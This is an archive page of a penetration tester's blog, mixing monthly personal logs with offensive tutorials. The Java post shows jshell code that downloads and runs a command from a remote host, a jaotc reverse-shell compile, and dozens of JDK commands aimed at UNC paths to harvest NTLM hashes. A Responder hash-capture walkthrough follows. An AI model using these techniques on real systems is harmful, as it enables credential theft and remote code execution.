Finding Missing Patches the hard way

In this post I present a short piece of PowerShell that helped me find missing patches in a .net application. The target was a thick client where source code was not provided. Almost everything has outdated dependencies and the goal for me is to see if any of them will provide an obvious way to exploit the target. Even if the dependencies are not exploitable it is great to get an insight into the development practices.

The backwards/hard way (No Source code)

The problem (for .net) can be broken into two stages:

  1. Identify the version information for all .dll files.
  2. Grunt work using Google to find the latest versions and any known vulnerabilities.

The first part was solved by the PowerShell below. Simply change the path and you get the filename and version number comma separated:

# Change the path to the application folder; prints "<file>,<FileVersion>" for every DLL in it
Get-ChildItem "C:\<path>\<to>\<folder>" -Filter *.dll |
Foreach-Object {
    # FileVersionInfo is read from the PE version resource of each DLL
    $version = (Get-Command $_.FullName).FileVersionInfo.FileVersion
    echo "$_,$version"
}

Then the dirty task: opening that output in Excel and using Google to confirm which were outdated. There is probably a shortcut somewhere for this task, but in the time available that did me.
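The comparison step can be partly automated once the latest versions have been looked up. The script below is an added example, not the post's own code: it reads the comma-separated lines the PowerShell loop prints and compares each DLL against a hand-filled table of latest known versions. The table values and the inventory are constructed for illustration (not real release data), and the file names are placeholders.

```python
"""Flag outdated dependencies from the 'filename,version' inventory.

Added example, not the original post's code. It takes the comma-separated
lines the PowerShell loop prints and compares each DLL against a
hand-filled table of the latest versions you found (the table below is
constructed for illustration, not real release data).
"""
import csv
import io
import re

# Constructed reference table: DLL file name -> latest version you looked up.
# Placeholder values; replace with what the vendor release pages say.
LATEST_KNOWN = {
    "Newtonsoft.Json.dll": "13.0.1.0",
    "log4net.dll": "2.0.12.0",
    "RestSharp.dll": "106.12.0.0",
}


def parse_version(text):
    """Turn '4.10.2.0' (or '4.10.2.0 built by: x') into a tuple of ints.

    Tuples compare numerically, so (4, 10) > (4, 9); comparing the raw
    strings would wrongly rank '4.10' below '4.9'. Returns () when the
    FileVersion field is empty or has no digits.
    """
    first = text.strip().split()[0] if text.strip() else ""
    return tuple(int(n) for n in re.findall(r"\d+", first))


def find_outdated(inventory_text, latest_known=LATEST_KNOWN):
    """Return (dll, found, latest) for every DLL older than the known latest.

    inventory_text is 'Name.dll,1.2.3.4' lines. Full paths are reduced to the
    file name. DLLs absent from latest_known are skipped; a DLL with no
    readable version is reported as 'unknown' rather than assumed current.
    """
    outdated = []
    for row in csv.reader(io.StringIO(inventory_text)):
        if not row or not row[0].strip():
            continue
        name = re.split(r"[\\/]", row[0].strip())[-1]
        found = row[1].strip() if len(row) > 1 else ""
        latest = latest_known.get(name)
        if latest is None:
            continue
        found_v = parse_version(found)
        if not found_v:
            outdated.append((name, "unknown", latest))
        elif found_v < parse_version(latest):
            outdated.append((name, found, latest))
    return outdated


# Constructed inventory, in the shape the PowerShell loop prints.
SAMPLE_INVENTORY = """\
Newtonsoft.Json.dll,9.0.1.19813
log4net.dll,2.0.12.0
RestSharp.dll,
MyApp.Core.dll,1.0.0.0
"""

if __name__ == "__main__":
    for dll, found, latest in find_outdated(SAMPLE_INVENTORY):
        print(f"{dll}: found {found}, latest known {latest}")
```

The version tuple comparison is the part worth keeping: sorting version strings lexically in a spreadsheet ranks 4.10 below 4.9, which is exactly how an outdated library slips through a manual review. A DLL with an empty FileVersion is reported rather than skipped, because a missing version resource is itself worth a look.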

What if you have the source code?

When you have source code access then your go-to is OWASP’s Dependency-Check.

While I love Dependency-Check and feel it is the best catch-all due to the wide range of languages it supports, I have also found that it is prone to false positives. Working with the formats it outputs is often a lot of work, for me at least. It is definitely a worthy tool and I will continue to use it.

If you have access to the source then I generally get better and more actionable information using language specific tools such as:

Hope this helped you in your hour of need.

Captain’s Log: September 2021

Here is how I did in the new condensed table format.

  • 11k steps a day – I hurt my ankle in March. Working on it with stretches and am back to walking about a bit. Hit several 10k step days in the month too.
  • 150 active minutes per week – Nowhere close. But I was closer than last month so positive.
  • 1 technical blog a month – It is written but waiting for the vendor patches which are in mid-October.
  • Support my partner to exercise – They stopped asking for this and I now am just taking the kids on wild adventures on Saturday mornings.
  • Record five songs – I still don’t know how to use Reaper but I have found the odd hour-long slots to write and record some stuff. It is all rough and cringey but I guess you don’t get anywhere without practice.
    Smiles
    Cowboys Have Metaphors
    No Manual
    There was also a Webinar that I did for work where I ended with a song. I have linked to that bit of the video at the end.
  • OSWE – I’ll be honest I think this is a Winter time activity.
  • Panic Attacks – September was a very stressful month at times. We were ill in a loop after the kids returned to school/nursery. There were several negative covid tests and many, many lost hours of sleep. As always, the panic attacks come when there is a lack of sleep. For the September weekend we got away some place. It was invigorating so I ended the month really probably the happiest I have been in a while. Hence the music getting made.

Other bits

  • Research – Vendor is releasing patches in October so I will be able to speak about this on various blogs next month. I have invested £99 in a bit of hardware just to go looking for vulns to mix up the target for the next time. That has not panned out great so far. It has actually been a pretty hard target given the limited number of features enabled and real effort being put into disabling all the androidy options that you would usually be able to flip on.
  • Work Stress – I had a very stressful time at work early in September where I put in an ungodly amount of hours over a week. I got the thing done so eventually felt good about it, but living through it I was pretty close to burning out. I did get support from colleagues when I put my hand up, so remember to work at places where you can play that card and know you will get assistance.
  • Audiobooks – Still plodding on with the Shoal series. I am at Nova War. Without massive stretches of the day where I am walking about outside I am not really getting the time for this it deserves. But it is good.
  • Television 1 – Deep Space 9. Really close to the end of it. There has been noise about Netflix losing various Star Trek franchises soon. Initially that seems to just be in the US but I guess the writing is on the wall. A fair amount of Netflix’s appeal to me is because it has ST properties. So let’s see.
  • Television 2 – Man Down. I finally got around to watching it all. What a great show that was. Disappointed to not get a resolution to the cliffhanger ending. It made me seriously crave more Rik Mayall energy. His part in the first series was absolutely electric.
  • Family – First weekend we did a play date on the Saturday then a nice breakfast at a café. This was nice because I actually met some dads for a change. Usually I head along to the park for the exercise. But hey, there I was debating whether a 36 year old Cristiano Ronaldo would have earned his transfer fee back in shirt sales already. I think yes. Kid 1 is getting to an age where they can almost watch a game of football with me, staying up late to do so having survived the Scotland vs Moldova game.
  • Family 2 – We managed a long weekend away from the house. I am dubbing this the anxiety buster. After years of cancelled or hectic and horrible holidays we managed one where I mostly relaxed. I came back more positive and more able to sign up to things.
  • Car Upgrade – Got a new car stereo fitted. Because who knew that phones would be made one day in the future without Aux cables??? Had to join the Bluetooth revolution eventually I guess.

For those who stuck to the end. Here is the outtro song from the Webinar I did:

Yes that is majorly product placement for my current employer. But that was the gig. Technically I was paid to write a song there so I am now semi-professional.

That is the log for September.

Captain’s Log: August 2021

Here is how I did in the new condensed table format.

  • 11k steps a day – I hurt my ankle in March. Working on it with stretches and am back to walking about a bit.
  • 150 active minutes per week – Not found an exercise I can get done with my ankle like this. There is quite limited availability for swimming pools atm due to covid and my exercise bike would put pressure on the ankle. Waiting on a referral to see what’s what with it. Though just at the end of the month I got back on the bike as the ankle had felt better for several days.
  • 1 technical blog a month – It is written but waiting for the vendor patches.
  • Support my partner to exercise – They stopped asking for this and I now am just taking the kids on wild adventures on Saturday mornings.
  • Record five songs – I played with Reaper a bit more. But no completed songs. I still don’t know how to use DAWs because I am fairly chaotic and have zero sense of timing.
  • OSWE – I’ll be honest I think this is a Winter time activity.
  • Panic Attacks – I have been well clear of panic attacks. Probably because I mostly got sleep when sleep was good to be got. But to clarify I feel a sense of dread literally every time I go to do something. It is exhausting to push through that sometimes but I always drive home happy and singing from every jaunt out.

Other bits

  • Research – Waiting on a vendor to patch vulns before I can toot about the next batch.
  • Audiobooks – Still plodding on with the Shoal series. I am at Nova War. Without massive stretches of the day where I am walking about outside I am not really getting the time for this it deserves. But it is good.
  • Television 1 – Deep Space 9. This is probably the 3rd time I have started watching it through. This time I am seeing it through the lens of racism. The whole show seems to be about hating the Cardassians at the start. Even from Miles who is supposed to be an enlightened Human member of Star Fleet.
  • Family – Still working on fun for family, fun for me and my partner, and fun for me. Not doing too badly at it. We have been out and about more for food. To a few museums. It has been pleasant. We even made it to a swimming pool in Glasgow for the first time this year. It has been impossible to book slots all summer. When they stopped taking bookings we rocked up at 9am to be told there was an hour to wait and we were entirely unprepared for that. So it was a victory to finally get into a pool.
  • Family 2 – With the return to school we have gained a less stressful work-life balance (aside from odd drop off and pickup times). My partner (and primary child herder) has enjoyed a few weeks of afternoons free of childcare and has thoroughly and deservedly chilled out. The much delayed thinking about returning to work is now back on the cards. It is rarely spoken about how childcare can be monotonous and unrewarding for some people. But because of love, and covid, they have stuck ably to the task for years beyond the age nurseries would take the kids. Not to be a martyr, but because we believed it was right to do it this way for us. That has come at a cost to our mental health at times. The last time there was light at the end of this tunnel lockdowns started and punched that back down hard for over a year. Living a life waiting for time to tick is exceptionally hard.
  • Pentesting – I found a target with “.svn” folders and used svn-extractor to get the win.
  • Housey stuff – Most weekends this August we do about an hour of tidying up as a family and get the place pretty decent. Many hands make light work and all that! That is what this month’s featured image is about. The fact we were tidying stuff regularly. As a result I was also able to do some of the DIY tasks and get things variously recycled, gifted, or out of my life for ever as appropriate. My home office has had a re-orientation and I am considering getting a second desk for “hobbies”. We have also paid for a new floor for the kitchen and are waiting on an installation date. It will be great to finally be able to mop a surface. I could rant for hours about how this house has broken flooring everywhere but I won’t.

That is the log for August.

Java giving more shells on everything

Back in 2018 I blogged about how java gives a shell for everything, and also how to compile in memory as an AV Evasion technique. Some of these techniques have now been added into gtfo bins, and heroes even integrated them into metasploit.

In this post I go through the most recent JDK/JRE and look for new features Pentesters may find useful. Apologies for this reading a bit like a shotgun blast of information. But this is essentially the notes I took as I poked around in the order I did it. I am personally most interested in the last part with “jshell” if you want to see just one part then go there.

First what about different Versions of Java?

There are two major versions of Java:

  • Java Runtime Environment (JRE) – Used on machines that only need to execute Java code. The “java” binary is used to execute code.
  • Java Development Kit (JDK) – Needed on developer machines. The “javac” command compiles “.java” files into “.class” files which can then be executed.

If you have landed on a laptop or workstation the chances are only the JRE is installed unless the user is a developer. If you land on a server which hosts a website powered by Java you probably have the JDK installed. There are far more binary commands bundled in the JDK than the JRE so there is more scope for naughtiness with the JDK.

Comparison of Binaries Available in JRE/JDK

I downloaded the most recent Windows JRE and JDK and compared the list of executables in the “/bin” folder. The raw data is in this spreadsheet. The short version is that these are the binaries which are shared between the JRE and JDK:

Shared by JRE and JDK:

  • jabswitch
  • java
  • javaw
  • keytool
  • kinit
  • klist
  • ktab
  • rmid
  • rmiregistry

List of commands shared by JRE and JDK

If you find something that works in these binaries then you should congratulate yourself for finding a universal Java technique.

Other points of note from the spreadsheet:

  • jjs.exe exists in the latest JRE meaning our JavaScript payload techniques are still in play there.
  • jrunscript.exe exists in the latest JDK. However, there appeared to be no Nashorn included.

I can confirm that Nashorn worked in “jjs.exe” for the most recent JRE:

Hello from Nashorn in JRE

And that it did not work out of the box for “jrunscript.exe” in the most recent JDK:

No Nashorn for you.

While the binary exists it has been neutered unless Nashorn has been added separately.

An easier command prompt via JJS

Last time I gave JavaScript commands that you could type into a JJS prompt which would give you a reasonably interactive command prompt. The reason for doing this is to get a functional command prompt in an environment where perhaps powershell.exe, cmd.exe, ftp.exe and so on are all blocked, that is, where block lists rather than allow lists decide which binaries may run. In that universe “jjs.exe” worked no problem.

This time I properly RTFM and spotted this nugget:

The JJS Manual

If you run “jjs” with “-scripting=true” then it will give you access to the “$EXEC()” function. This can be used to execute local commands within JJS without needing to type in any JavaScript:

Using $EXEC

A minor improvement depending on how you want to look at it. It is a little inconvenient typing “$EXEC()” every time. So you can save a few keystrokes with a simple function that shortens it:

using “a” function to alias $EXEC()

But then I got intrigued by what other binaries were hanging around in a modern JDK install. So I looked into the contents of the “bin” folder again.

Ahead of Time Compilation with jaotc

I spotted a new binary called “jaotc” which has a useful tutorial here. Jaotc is summarised as:

“The Java static compiler that produces native code for compiled Java methods”

Hackers’ ears must have pricked up there. Did you say “native code”? I can confirm it did. It aims to make Java apps faster by letting you convert a class to native code.

It will compile a class file into a “.so” library. Let’s assume you have a reverse shell in “rev.java”; your workflow is like this:

javac rev.java
jaotc --output rev.so rev.class

Line 1 compiles it into normal Java Bytecode.
Line 2 converts that to a native library.

If you run the file command it is now an ELF binary:

file rev.so
rev.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, not stripped

Who knows what transforms have just gone on to make that magic work. The transforms might be useful for hiding payloads. I am not a reverse engineer by any stretch of the term so I have probably not grasped the hacking potential of this.

To run your library via Java you need to do this:

java -XX:+UnlockExperimentalVMOptions -XX:AOTLibrary=./rev.so

Note: at the moment this is an experimental option so you need the “UnlockExperimentalVMOptions” argument.

It will work on Linux and on the Windows Subsystem for Linux. There is no support for compiling “.dll” files so this is going to be a niche choice, and I am not entirely sure how to use it for nefarious purposes today. A pin in that for later maybe.

Triggering DNS/Getting NTLM Hashes

JDK/JRE binaries allow input files within their command line arguments. These accept UNC paths so can be used to trigger DNS resolution. If you are on the same network (or the Firewall is crazy and allows SMB outbound) then you can use responder to capture NTLM hashes:

Capturing hashes landing in Responder Logs

Note: I have a recent post which includes a bit on how to crack these hashes.

JDK/JRE binaries have a myriad of options which handle file paths. I stopped looking when I found one way to do it per binary or I had spent longer than 5 minutes looking. Therefore this is not exhaustive and there will be more:

jar -v -t --file=\\192.168.45.129\test
jarsigner -verify \\192.168.45.129\test
java \\192.168.45.129\test
javac \\192.168.45.129\test
javadoc \\192.168.45.129\test
javap \\192.168.45.129\test
jcmd 1 -f \\192.168.45.129\test
jdeprscan.exe \\192.168.45.129\test
jdeps \\192.168.45.129\test
jfr metadata \\192.168.45.129\test
jhsdb clhsdb --core \\192.168.45.129\test --exe test.exe # Do not use this
jimage info \\192.168.45.129\test
jlink --module-path \\192.168.45.129\test
jmap -histo:live,file=\\192.168.45.129\test <pid> # Requires PID for valid Java Process
jmod list \\192.168.45.129\test
jpackage --input \\192.168.45.129\test --main-jar test
jrunscript.exe -cp \\192.168.45.129\test
jshell \\192.168.45.129\test
kinit -c \\192.168.45.129\test
klist -c -f FILE:\\192.168.45.129\test
ktab -k FILE:\\192.168.45.129\test
rmid -log \\192.168.45.129\test

Note: the “jhsdb” command opens its own command prompt interface which would remain open if you had a victim open it. While it did result in an SMB handshake I would not advise using this.

In addition to those above, I found an almost universal way to trigger an SMB interaction. Most binaries would run a JVM when they execute, which makes sense because they are made in Java. The JVM supports various options. The “Xloggc” option (or the incoming “-Xlog:gc” syntax) can specify the location for a log file whenever the JVM does garbage collection. It accepts UNC paths.

The beautiful thing is that this triggers an SMB connection as the JVM loads, meaning that you do not need to supply valid command line arguments to the binary you are launching. This saves a lot of effort reading “--help”.

The following is a list of examples that worked for the most recent JDK binaries:

jaccessinspector.exe -J-Xloggc:\\192.168.45.129\test
jarsigner.exe -J-Xloggc:\\192.168.45.129\test
javadoc -J-Xloggc:\\192.168.45.129\test
javap -J-Xloggc:\\192.168.45.129\test
javaw -Xloggc:\\192.168.45.129\test # This causes a GUI popup error
jcmd -J-Xloggc:\\192.168.45.129\test
jconsole -J-Xloggc:\\192.168.45.129\test # This causes a GUI popup error
jdb -J-Xloggc:\\192.168.45.129\test
jdeprscan -J-Xloggc:\\192.168.45.129\test
jdeps -J-Xloggc:\\192.168.45.129\test
jfr -J-Xloggc:\\192.168.45.129\test
jhsdb -J-Xloggc:\\192.168.45.129\test
jimage -J-Xloggc:\\192.168.45.129\test
jinfo -J-Xloggc:\\192.168.45.129\test
jlink -J-Xloggc:\\192.168.45.129\test
jmap -J-Xloggc:\\192.168.45.129\test
jmod -J-Xloggc:\\192.168.45.129\test
jpackage -J-Xloggc:\\192.168.45.129\test
jps -J-Xloggc:\\192.168.45.129\test
jrunscript -J-Xloggc:\\192.168.45.129\test
jshell -J-Xloggc:\\192.168.45.129\test
jstack -J-Xloggc:\\192.168.45.129\test
jstat -J-Xloggc:\\192.168.45.129\test
jstatd -J-Xloggc:\\192.168.45.129\test
keytool -list -J-Xloggc:\\192.168.45.129\test
kinit -J-Xloggc:\\192.168.45.129\test
klist -J-Xloggc:\\192.168.45.129\test
ktab -J-Xloggc:\\192.168.45.129\test
rmid.exe  -J-Xloggc:\\192.168.45.129\test
rmiregistry -J-Xloggc:\\192.168.45.129\test
serialver -J-Xloggc:\\192.168.45.129\test

Pretty much every binary in the JDK supported this approach!

As the “java” command runs the JVM directly there is no need for the “-J-” part, so this is the syntax for doing the same there:

java -Xloggc:\\192.168.45.129\test

When a binary existed in both the JDK and JRE there were subtle differences. For example, the JDK version of “javaw” required the “-J-” syntax, while the JRE version worked using “-Xloggc” directly.

As always experiment on your own computer before attempting the technique on a victim’s PC. That nugget of advice is pure gold and will save you thousands of wasted hours.

jshell is my new favourite thing

This command was new to me and its name immediately stood out as potentially useful. This makes Java an interpreted language!!! You can write whatever Java you want and it executes it exactly the same way as using the Python interpreter for example:

InputStream inputStream = new URL("http://192.168.45.129/test").openStream();
String cmd = new BufferedReader(new InputStreamReader(inputStream)).lines().collect(Collectors.joining("\n"));
Process proc = Runtime.getRuntime().exec(cmd);
String result = new BufferedReader(new InputStreamReader(proc.getInputStream())).lines().collect(Collectors.joining("\n"));

The above will download a file over HTTP and save the contents of the file into the “cmd” String. It will then run that command and save the output to the “result” string. The screenshot below shows this operating:

Using jshell

I saved the command “whoami” in the “test” file which was then served using a python HTTP listener like this:

python -m SimpleHTTPServer 80

You can see that above in the line saying cmd ==> “whoami”.

Additionally, you can store Java commands in a .jsh file and then have them execute as shown:

jshell whatever.jsh

If you save the above example into “whatever.jsh” it will run the commands blindly and you won’t see what was run. If you type “result” though the output from the command will be there. This puts your payload on Disk where it is more likely to be gobbled by AV.

There is a nice tutorial for jshell here. To me this has the same impact as “jrunscript” and “jjs” did before for Nashorn. Only now you are writing payloads in Java instead of JavaScript.

This thing is gorgeous and I love it because it is another scripting language essentially and one which may be a blind spot.
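From the defensive side, the UNC-path and -Xloggc tricks above and the jjs/jshell script hosting are all visible in process-creation telemetry. The script below is an added example, not the post's code: it runs those heuristics over a handful of constructed process events. The event records and their 'image'/'cmdline' field names are assumptions to be mapped onto whatever your EDR or Sysmon export actually provides; the tool names come from the JDK/JRE bin listings in the post.

```python
"""Heuristics for JDK/JRE tools pointed at UNC paths or used as script hosts.

Added example, not from the original post. It scans process-creation command
lines for the behaviours described above: any UNC path in a Java tool's
arguments, a JVM GC log aimed at a UNC path via -Xloggc: (or the newer
-Xlog:gc:file= form), jjs started in -scripting mode, and jshell given a
.jsh file. The event records are constructed; the 'image'/'cmdline' field
names are an assumption and should be mapped onto your EDR or Sysmon export.
"""
import re

# Tool names from the JDK/JRE bin listings in the post.
JAVA_TOOLS = {
    "jaccessinspector", "jar", "jarsigner", "java", "javac", "javadoc",
    "javap", "javaw", "jcmd", "jconsole", "jdb", "jdeprscan", "jdeps", "jfr",
    "jhsdb", "jimage", "jinfo", "jjs", "jlink", "jmap", "jmod", "jpackage",
    "jps", "jrunscript", "jshell", "jstack", "jstat", "jstatd", "keytool",
    "kinit", "klist", "ktab", "rmid", "rmiregistry", "serialver",
}

UNC_PATH = re.compile(r"\\\\[\w.-]+\\[^\s\"']+")        # \\host\share\...
GC_LOG_UNC = re.compile(r"-Xlog(?:gc:|:gc:file=)\\\\")  # -Xloggc:\\ or -Xlog:gc:file=\\


def tool_name(image):
    """'C:\\Program Files\\Java\\jdk-16\\bin\\jshell.exe' -> 'jshell'."""
    base = re.split(r"[\\/]", image)[-1]
    return re.sub(r"\.exe$", "", base, flags=re.IGNORECASE).lower()


def analyse(event):
    """Return finding labels for one process-creation event (empty if benign)."""
    tool = tool_name(event["image"])
    if tool not in JAVA_TOOLS:
        return []
    cmd = event["cmdline"]
    findings = []
    if GC_LOG_UNC.search(cmd):
        findings.append("jvm-gc-log-to-unc")      # works on almost every tool via -J
    elif UNC_PATH.search(cmd):
        findings.append("unc-path-argument")      # tool-specific file option
    if tool == "jjs" and "-scripting" in cmd:
        findings.append("jjs-scripting-mode")     # $EXEC() becomes available
    if tool == "jshell" and re.search(r"\.jsh\b", cmd, re.IGNORECASE):
        findings.append("jshell-script-file")     # Java payload read from disk
    return findings


def scan(events):
    """Return (tool, finding) pairs for a list of events, in event order."""
    return [(tool_name(e["image"]), f) for e in events for f in analyse(e)]


# Constructed events: command lines modelled on the post's examples plus two benign ones.
SAMPLE_EVENTS = [
    {"image": r"C:\Program Files\Java\jdk-16\bin\javap.exe",
     "cmdline": r"javap -J-Xloggc:\\192.168.45.129\test"},
    {"image": r"C:\Program Files\Java\jdk-16\bin\jar.exe",
     "cmdline": r"jar -v -t --file=\\192.168.45.129\test"},
    {"image": r"C:\Program Files\Java\jre\bin\jjs.exe",
     "cmdline": r"jjs -scripting=true"},
    {"image": r"C:\Program Files\Java\jdk-16\bin\jshell.exe",
     "cmdline": r"jshell whatever.jsh"},
    {"image": r"C:\Program Files\Java\jdk-16\bin\javac.exe",
     "cmdline": r"javac C:\src\Main.java"},                    # local path: benign
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c type \\192.168.45.129\share\a.txt"},  # not a Java tool: ignored
]

if __name__ == "__main__":
    for tool, finding in scan(SAMPLE_EVENTS):
        print(f"{tool}: {finding}")
```

The GC-log check is the one to prioritise: as the post notes it fires on nearly every JDK binary regardless of the other arguments, so a single rule on `-Xloggc:\\` covers the whole list. A UNC path in a Java tool's arguments is noisier on developer machines that build from network shares, so that finding is better scored against whether the host is expected to run the JDK at all.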

Captain’s Log: July 2021

Here is how I did in the new condensed table format.

  • 11k steps a day – I hurt my ankle in March. I have basically given myself a free pass and seen my health decline as a result. Now I am back to doing more exercise. Mixing YouTube videos with the kids and other activity. I have seen my steps back up to around the 10k a day mark. This is progress but it is slow. Then right at the end of the month my ankle has started hurting again. Time to get a GP involved.
  • 150 active minutes per week – Start of July was a nightmare in terms of hay fever. I figure better cardio health is probably a good tool for bad days. So I have resolved to increase this again. Now the battle is getting what Fitbit determines to be “Active Zone” minutes. Several times I have been out murdering parts of the garden dripping with sweat only to find that hour didn’t count. Logically I was definitely working hard. Not sure how to be measuring this now.
  • 1 technical blog a month – I have failed to achieve this.
  • Support my partner to exercise – They stopped asking for this and I now am just taking the kids on wild adventures in and around the house for Saturday mornings.
  • Record five songs – I did not make anything ready to release. I have acquired a new DAW (Reaper) but have not had time to go through any tutorials for it. This is in the wake of Audacity going to the dogs and because I never quite got along with Ableton Live Lite which I have used before. I have done a lot of playing guitar in the garden but have not recorded anything.
  • OSWE – I’ll be honest I think this is a Winter time activity.
  • Panic Attacks – I had the start of a panic attack after gardening and probably reacting badly to all of the pollen. When you cannot breathe that is a good time to start a panic in my opinion. I got over it pretty quickly.

We went to Edinburgh for a weekend and the start of the drive definitely had me feeling the panic rising. This is possibly because I have not been further than 3 miles all pandemic. The hotel was worryingly about 5 degrees C hotter inside than outside in a heat wave. I have sensitivity around being too hot and if I cannot cool down then I am not really able to relax. Eventually we did what we had booked before we arrived and then checked out as soon as possible and went home. The thought of a second night not sleeping in the furnace of a room was not great.

Other bits

  • Research – Having cleared the Fedena stuff I finally went hunting for more CVEs. As part of a team at work we have found 10 new CVE worthy vulnerabilities in another bit of Open Source software. The vendor has been responsive (result!) and hopefully I can turn this around in way less than 12 months to disclosure like Fedena was. There is scope for a blog and a talk at DC44141 for September IF they can get the patches out in time.
  • Euro 2020 – What an amazing tournament this was. I really enjoyed it. Scotland’s cameo showed we needed a striker but that is life. Our players have experience now so let’s go for more qualifications.
  • Audiobooks 1 – as I have picked up the exercise and steps again I have finally completed Stealing Light: Shoal, Book 1 by Gary Gibson. This was really entertaining and had some nice ideas in there. I am now a couple of hours into the second book in the series.
  • Television 1 – Deep Space 9. This is probably the 3rd time I have started watching it through. This time I am seeing it through the lens of racism. The whole show seems to be about hating the Cardassians at the start. Even from Miles who is supposed to be an enlightened Human member of Star Fleet.
  • Movies – We watched Parasite. It was a fun couple of evenings (because parents can rarely watch a film in one sitting).
  • Family – I have made an effort to ensure each day has fun for me, fun for me and the kids, and fun for me and my partner. I think the pandemic really had done a number on my happiness. This seems to be the way to go. We went on a trip to Edinburgh (the first time I have gone more than 3 miles since lockdown 1). This was largely a success.
  • Outside 1 – We travelled more than 3 miles for the first time since lockdown 1. We went to Edinburgh to see the Ray Harryhausen exhibit. I thoroughly recommend it if you have enjoyed any of his movies growing up. It has many models that made me go *squee*. Highlight of the trip for the kids was a go in a swimming pool at the hotel. This was a great weekend because I didn’t have a major freak out and this is progress. It gets easier as the kids get bigger.
  • Outside 2 – Last weekend of July we went to the Glasgow Science Centre. This is always a joyous experience and you should also give that a go. The soft play part on the middle floor is closed (probably because Covid would make that a nightmare to police). There is still oodles to see and do. We gave the cafe a go and rate it pretty highly.

That is the log for July.

Captain’s Log: June 2021

Here is how I did in the new condensed table format.

  • 11k steps a day – I hurt my ankle in March. I am out of this game for the foreseeable.
  • 150 active minutes per week – I am not getting “active” minutes (on the FitBit scale) on the exercise bike to the same degree I was from jogging. But I am doing 20 minutes at least 3 times a week. I am going out for walks with the kids and gardening at the weekends. None of this is seemingly counting on the FitBit scale. I am working on getting back to activity; it feels closer.
  • 1 technical blog a month – Success. I documented the basics of attacking an internal network using Responder, Hashcat, Metasploit, Bloodhound and CrackMapExec. Giddy thrill of apparently this being shared by threat actors enough to wind up in threat intelligence feeds. Which is bemusing for entry level tooling and techniques that have been around for years.
  • Support my partner to exercise – They stopped asking for this and I now am just taking the kids on wild adventures in and around the house for Saturday mornings. Counting down the days until I get vaccinated and feel willing to go to visitor attractions again like the world class museums in Glasgow.
  • Record five songs – I have recorded heaps of short ideas. Mostly on the guitar sat out in the sunshine. Some of them I can see me converting into 2-3 minute items.
  • OSWE – I’ll be honest I think this is a Winter time activity.
  • Panic Attacks – I have avoided them again this month.

Other bits

  • Research – I was not able to talk about this last month but the Fedena research finally came out. My team and I found seven vulnerabilities in this school management software. It took over a year from discovery to posting. This was picked up by The Daily Swig, which was nice! Getting clear of this has given me a boost to go find some more bugs. The technical details for the authentication bypass CVE-2021-27980 are out for reading. Or just the short video of the PoC:

  • Euro 2020 – I cannot adequately put into words how excited I was for this. I barely watch football these days but I just love these tournaments. The fact that Scotland were at the party just made it all the more exciting. The build up to the first game was fantastic and I was singing through the entire game. It doesn’t matter that Scotland exited early. We actually played pretty well. I would say that was pretty much the tale for our tournament in the end. We played well. We created chances. But we couldn’t take them and that was the end of that.
  • Audiobooks 1 – technically still on Stealing Light: Shoal, Book 1 by Gary Gibson. A good bit of Sci-Fi. But without much exercise or walking occurring these days my time has been limited.
  • Television 1 – Star Trek Voyager. I have completed this and it honestly stands up quite well. Last time I watched it there were far more episodes I wanted to skip. This time I was ok with most of it. Some excellent Star Trek in here.
  • Television 2 – Brooklyn 99. After Voyager I fell back into season 7 of this. What a lovingly made show this is. Captain Raymond Holt going badass over his fluffy boy being kidnapped is a total highlight.
  • House – We booked someone to come replace the bathroom sink and they have not done so yet. We have sort of been stuck waiting on that as we are trying to do things in a set order.
  • Garden – Has paid out strawberries twice already this summer. I have had horrific hay fever (the worst I have ever had) but I have still been able to murder the lawn appropriately so hopefully I will learn to get that done more effectively to minimise the impact. I have been out the back in a Darth Vader style breathing mask but that didn’t actually reduce the symptoms after cutting the grass. Answers on a post card (or comment) welcome.

That is the log for June.

Grabbing NTLM hashes with Responder then what?

Local networks have lots of things on them that we as penetration testers can exploit. In a Windows environment there are often protocols (LLMNR and NBT-NS) which are easily exploitable. Effectively you are running a man-in-the-middle attack and using it to intercept traffic sent by users in order to capture their hashed password.

To do this you need to be in control of a machine in the LAN which for us usually means our laptop, or a VM if the customer is enabling remote testing via a VPN.

Running Responder

For years the tool of choice has been Responder.

If you are doing this on a remote server rather than your laptop then you should first launch “tmux”. I have blogged about persistent SSH sessions before. The super tl;dr version is this:

tmux new -s <session name>
tmux new -s responder

If you get disconnected you will need to re-establish your SSH connection. Then you can reattach:

tmux attach -t <session name>
tmux attach -t responder

It is worth your energy to learn more about tmux:

As for running responder it is as simple as this:

responder -I <interface>
responder -I eth0

It is capable of many more things such as prompting users with fake prompts to obtain plaintext passwords. In this default configuration it will find LLMNR and NBT-NS traffic. It will respond on behalf of the servers the victim is looking for and capture their NTLM hashes.

These NTLMv2 hashes have to be cracked using brute force before they can be used. This is in contrast to the password hashes you may pull out of the registry for local Windows accounts, where you can use pass-the-hash.

Responder Log Files

As responder runs it saves detailed logs in this folder:

/usr/share/responder/logs

For each capture there will be a file like “SMB-NTLMv2-SSP-<ip>.txt”, where <ip> is the address of the victim machine that sent the authentication (the “Client” field in the terminal output), not the server it was trying to reach. There will be repeated hashes for the same account because you will likely have captured the same user multiple times.

For completeness you may want to try cracking every different hash because what if the victim had typed their credentials incorrectly? In practice when you have hundreds of unique user hashes the risk of that is pretty minimal. If you want to crack all the things take all of these “SMB-NTLMv2-SSP-<ip>.txt” files and run them through hashcat (shown later).

When I have hundreds of hashes, the file I work with is “Responder-Session.log”. This is equivalent to what the tool spits out to the terminal as it captures things. To use this I use a bash loop to extract the first hash for each username.

Bash Loop To Extract Unique Hashes

First we need to list the unique usernames we have captured:

strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'

Some points about this:

  • The sort command: “-u” (unique) and “-f” (fold case, i.e. case insensitive).
  • Cut is wonderful at splitting a line on a delimiter and selecting specific columns from the result. With “-f 4-6” we take the username together with its domain, i.e. “cornerpirate::DOMAIN” (the two colons are part of the hashcat format, so the empty field between them counts as a column). This means that if the same username exists across domains you get one entry per domain.
  • The awk command re-splits the line on whitespace and rejoins it, which strips the leading space; without it every username would be preceded by a blank.

For each username we need to obtain the first NTLMv2 hash and save it into a file:

for user in `strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'`
do
  echo "[*] search for: $user";
  # -F treats the username as a fixed string (machine accounts contain "$") and the
  # surrounding ": " and ":" stop "jsmith::DOMAIN" also matching "ajsmith::DOMAIN"
